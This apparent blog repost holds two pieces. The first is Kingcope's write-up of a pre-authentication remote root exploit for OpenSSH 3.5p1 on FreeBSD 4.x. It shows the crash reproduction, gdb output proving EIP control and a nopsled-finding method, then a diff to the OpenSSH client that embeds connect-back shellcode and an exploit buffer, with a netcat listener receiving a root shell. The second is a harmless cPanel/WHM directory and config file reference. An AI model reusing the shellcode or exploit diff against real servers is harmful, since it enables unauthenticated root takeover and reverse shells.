OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Standard

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Discovered and Exploited By Kingcope
Year 2011
--
The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.
The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".
A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.
The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".
http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c
This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.
Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.
Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.
By supplying a long username to the daemon the sshd crashes.
h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Looking into the coredump reveals:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)
The sshd crahes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:
h4x# killall -9 sshd
h4x# /usr/sbin/sshd
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.
As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez (at) googlemail.com
Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.
The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.
Only one offset is needed, the position of the shellcode can be found the following way:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x
The printed address is the beginning of the shellcode nopsled.
Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.
It roughly does the following:
root@debian:~# ./ssh -1 192.168.32.138
root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)
--
root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "xc0xa8x20x80"
> #define PORT  "x27x10"              /* htons(10000) */
>
> char sc[] =
>    "x90x90"
>    "x90x90"
>    "x31xc9"                 // xor    ecx, ecx
>    "xf7xe1"                 // mul    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x51"                     // push   ecx
>    "xb0x61"                 // mov    al, 97
>    "xcdx80"                 // int    80h
>    "x89xc3"                 // mov    ebx, eax
>    "x68"IPADDR                       // push   dword 0101017fh
>    "x66x68"PORT             // push   word 4135
>    "x66x51"                 // push   cx
>    "x89xe6"                 // mov    esi, esp
>    "xb2x10"                 // mov    dl, 16
>    "x52"                     // push   edx
>    "x56"                     // push   esi
>    "x50"                     // push   eax
>    "x50"                     // push   eax
>    "xb0x62"                 // mov    al, 98
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xb0x5a"                 // mov    al, 90
>    "x49"                     // dec    ecx
>    "x51"                     // push   ecx
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xe2xf5"                 // loop   -10
>    "x51"                     // push   ecx
>    "x68x2fx2fx73x68"     // push   dword 68732f2fh
>    "x68x2fx62x69x6e"     // push   dword 6e69622fh
>    "x89xe3"                 // mov    ebx, esp
>    "x51"                     // push   ecx
>    "x54"                     // push   esp
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xb0xc4x34xff"
>    "xcdx80";                // int    80h
>
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, 'x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
690a749
>
Cheers,

Kingcope

 

Fonte: http://www.exploit-db.com/exploits/17462/

Estrutura de diretórios do Cpanel/WHM (arquivos fundamentais para uso normal)

Standard

Apache

/usr/local/apache
+ bin- apache binaries are stored here – httpd, apachectl, apxs

+ conf – configuration files – httpd.conf

+ cgi-bin

+ domlogs – domain log files are stored here

+ htdocs

+ include – header files

+ libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so

+ logs – apache logs – access_log, error_log, suexec_log

+ man – apache manual pages

+ proxy –

+ icons –

Cpanel script to restart apache – /scripts/restartsrv_httpd

Start httpd with ssl – /etc/init.d/httpd startssl

DNS – Named(Bind)

Program: /usr/sbin/named

Init Script: /etc/rc.d/init.d/named

/etc/named.conf

db records:/var/named/

/var/log/messages

Exim

Conf : /etc/exim.conf – exim main configuration file

/etc/localdomains – list of domains allowed to relay mail

Log : /var/log/exim_mainlog – incoming/outgoing mails are logged here

/var/log/exim_rejectlog – exim rejected mails are reported here

/var/log/exim_paniclog – exim errors are logged here

Mail queue: /var/spool/exim/input

Cpanel script to restart exim – /scripts/restartsrv_exim

Email forwarders and catchall address file – /etc/valiases/domainname.com

Email filters file – /etc/vfilters/domainname.com

POP user authentication file – /home/username/etc/domainname/passwd

catchall inbox – /home/username/mail/inbox

POP user inbox – /home/username/mail/domainname/popusername/inbox

POP user spambox – /home/username/mail/domainname/popusername/spam

Program : /usr/sbin/exim (suid – -rwsr-xr-x 1 root root )

Init Script: /etc/rc.d/init.d/exim

Mysql

Program : /usr/bin/mysql

Init Script : /etc/rc.d/init.d/mysql

Conf : /etc/my.cnf, /root/.my.cnf

Data directory – /var/lib/mysql – Where all databases are stored.

Database naming convention – username_dbname (eg: john_sales)

Permissions on databases – drwx 2 mysql mysql

Socket file – /var/lib/mysql/mysql.sock, /tmp/ mysql.sock

SSHD

Program :/usr/local/sbin/sshd

Init Script :/etc/rc.d/init.d/sshd

/etc/ssh/sshd_config

Log: /var/log/messages

ProFTPD

Program :/usr/sbin/proftpd

Init Script :/etc/rc.d/init.d/proftpd

Conf: /etc/proftpd.conf

Log: /var/log/messages, /var/log/xferlog

FTP accounts file – /etc/proftpd/username – all ftp accounts for the domain are listed here

Pure-FTPD

Program : /usr/sbin/pure-ftpd

Init Script :/etc/rc.d/init.d/pure-ftpd

Conf: /etc/pure-ftpd.conf

Anonymous ftp document root – /etc/pure-ftpd/ip-address

Perl

Program :/usr/bin/perl

Directory :/usr/lib/perl5/5.6.1/

PHP

Program :/usr/local/bin/php, /usr/bin/php

ini file: /usr/local/lib/php.ini – apache must be restarted after any change to this file

Cpanel

/usr/local/cpanel

+ 3rdparty/ – tools like fantastico, mailman files are located here

+ addons/ – AdvancedGuestBook, phpBB etc

+ base/ – phpmyadmin, squirrelmail, skins, webmail etc

+ bin/ – cpanel binaries

+ cgi-sys/ – cgi files like cgiemail, formmail.cgi, formmail.pl etc

+ logs/ – cpanel access log and error log

+ whostmgr/ – whm related files

WHM

/var/cpanel – whm files

+ bandwidth/ – rrd files of domains

+ username.accts – reseller accounts are listed in this files

+ packages – hosting packages are listed here

+ root.accts – root owned domains are listed here

+ suspended – suspended accounts are listed here

+ users/ – cpanel user file – theme, bwlimit, addon, parked, sub-domains all are listed in this files

+ zonetemplates/ – dns zone template files are taken from here

Important cpanel/whm files

/usr/local/apache/conf/httpd.conf – apache configuration file

/etc/exim.conf – mail server configuration file

/etc/named.conf – name server (named) configuration file

/etc/proftpd.conf – proftpd server configuration file

/etc/pure-ftpd.conf – pure-ftpd server configuration file

/etc/valiases/domainname – catchall and forwarders are set here

/etc/vfilters/domainname – email filters are set here

/etc/userdomains – all domains are listed here – addons, parked,subdomains along with their usernames

/etc/localdomains – exim related file – all domains should be listed here to be able to send mails

/var/cpanel/users/username – cpanel user file

/var/cpanel/cpanel.config – cpanel configuration file ( Tweak Settings )*

/etc/cpbackup-userskip.conf –

/etc/sysconfig/network – Networking Setup*

/etc/hosts –

/var/spool/exim –

/var/spool/cron –

/etc/resolv.conf – Networking Setup–> Resolver Configuration

/etc/nameserverips – Networking Setup–> Nameserver IPs ( FOr resellers togive their nameservers )

/var/cpanel/resellers – For addpkg, etc permissions for resellers.

/etc/chkserv.d – Main >> Service Configuration >> Service Manager *

/var/run/chkservd – Main >> Server Status >> Service Status *

/var/log/dcpumon – top log process

/root/cpanel3-skel – skel directory. Eg: public_ftp, public_html. (AccountFunctions–>Skeleton Directory )*

/etc/wwwacct.conf – account creation defaults file in WHM (Basic cPanel/WHMSetup)*

/etc/cpupdate.conf – Update Config *

/etc/cpbackup.conf – Configure Backup*

/etc/clamav.conf – clamav (antivirus configuration file )

/etc/my.cnf – mysql configuration file

/usr/local/Zend/etc/php.ini OR /usr/local/lib/php.ini – php configuration file

/etc/ips – ip addresses on the server (except the shared ip) (IP Functions–>Show IP Address Usage )*

/etc/ipaddrpool – ip addresses which are free

/etc/ips.dnsmaster – name server ips

/var/cpanel/Counters – To get the counter of each users.

/var/cpanel/bandwidth – To get bandwith usage of domains

Fonte: http://wirednless.com/2009/01/cpanel-directory-and-files/